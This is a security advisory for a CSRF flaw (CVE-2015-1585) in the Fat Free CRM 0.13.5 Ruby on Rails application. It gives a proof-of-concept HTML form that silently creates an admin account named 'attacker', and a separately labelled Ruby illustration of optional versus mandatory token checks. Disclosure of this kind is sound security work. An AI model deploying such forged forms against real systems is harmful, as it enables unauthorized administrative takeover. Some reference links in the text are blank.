
[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5


Product Information:

Software: Fat Free CRM 

Tested Version: 0.13.5, released 22.1.2015, with over 10.000 downloads

Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)

Download link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5

Description: An open source, Ruby on Rails customer relationship management 
platform (CRM). Out of the box it features group collaboration, campaign and 
lead management, contact lists, and opportunity tracking (copied from 


Vulnerability description:

When an authenticated administrative user of Fat Free CRM is creating another 
user account, the following POST request is sent to the server:

POST /admin/users HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 356
Cookie:  _session_id=$foo1; user_credentials=$foo2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


As can be seen, the application already uses a CSRF token, the parameter 
authenticity_token, which has sufficient entropy. Nevertheless, this 
parameter is optional rather than mandatory when creating a user. When the 
following Proof-of-Concept is executed, a new administrative user called 
"attacker" with the password 1234 is created. 

    <!-- Cross-site form posting to /admin/users; no authenticity_token field
         is included, and the server accepts the request without it -->
    <form action="" method="POST">
      <!-- utf8 marker field that Rails forms send (decodes to a check mark) -->
      <input type="hidden" name="utf8" value="&#10003;" />
      <input type="hidden" name="user&#91;username&#93;" value="attacker" />
      <input type="hidden" name="user&#91;email&#93;" value="test&#64;test&#46;org" />
      <input type="hidden" name="user&#91;password&#93;" value="1234" />
      <input type="hidden" name="user&#91;password&#95;confirmation&#93;" value="1234" />
      <!-- admin flag set, so the created account is administrative -->
      <input type="hidden" name="user&#91;admin&#93;" value="1" />
      <input type="hidden" name="commit" value="Create&#32;User" />
      <input type="submit" value="Submit request" />
    </form>



Every state-changing operation within Fat Free CRM uses the parameter 
authenticity_token in order to prevent CSRF attacks. Nevertheless, all of 
these operations can be triggered by a CSRF attack, because the parameter is 
always optional and is not required by the server. 
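As an added illustration (not code from Fat Free CRM or from this advisory), the following Ruby model of Rails-style forgery protection contrasts a token check that only runs when a token happens to be present with a mandatory check that rejects state-changing requests lacking one; in a real Rails application the mandatory behaviour is what `protect_from_forgery with: :exception` enforces. The session, token and forged parameters below are constructed for the demonstration.

```ruby
require 'securerandom'

SAFE_METHODS = %w[GET HEAD].freeze

# Rails accepts the token either as the authenticity_token form field or the
# X-CSRF-Token request header; a forged cross-site form can send neither.
def submitted_token(params, headers)
  params['authenticity_token'] || headers['X-CSRF-Token']
end

# Constant-time comparison so the check itself does not leak the token.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Vulnerable pattern: the token is verified only if the client sent one.
# A request that simply omits it is treated as verified.
def verified_request_optional?(method, session, params, headers)
  return true if SAFE_METHODS.include?(method)
  token = submitted_token(params, headers)
  token.nil? || secure_compare(session[:csrf_token].to_s, token.to_s)
end

# Fixed pattern: every state-changing request must carry a matching token.
def verified_request_strict?(method, session, params, headers)
  return true if SAFE_METHODS.include?(method)
  token = submitted_token(params, headers)
  !token.nil? && !session[:csrf_token].nil? &&
    secure_compare(session[:csrf_token], token.to_s)
end

# Constructed sample: the victim's session holds a token; the forged request
# carries the user-creation fields but no token and no X-CSRF-Token header.
SESSION = { csrf_token: SecureRandom.base64(32) }.freeze
FORGED_PARAMS = { 'user[username]' => 'attacker', 'user[admin]' => '1' }.freeze
FORGED_HEADERS = {}.freeze

def demo
  legit = FORGED_PARAMS.merge('authenticity_token' => SESSION[:csrf_token])
  {
    optional_check: verified_request_optional?('POST', SESSION, FORGED_PARAMS, FORGED_HEADERS),
    strict_check:   verified_request_strict?('POST', SESSION, FORGED_PARAMS, FORGED_HEADERS),
    legit_request:  verified_request_strict?('POST', SESSION, legit, {})
  }
end

puts demo if __FILE__ == $0
```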



Update to the latest version, which is  0.13.6, see 

See also 



Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 12.2.2015
Fix by vendor: 12.2.2015
Public Advisory: 14.2.2015


Best regards,

Sven Schleier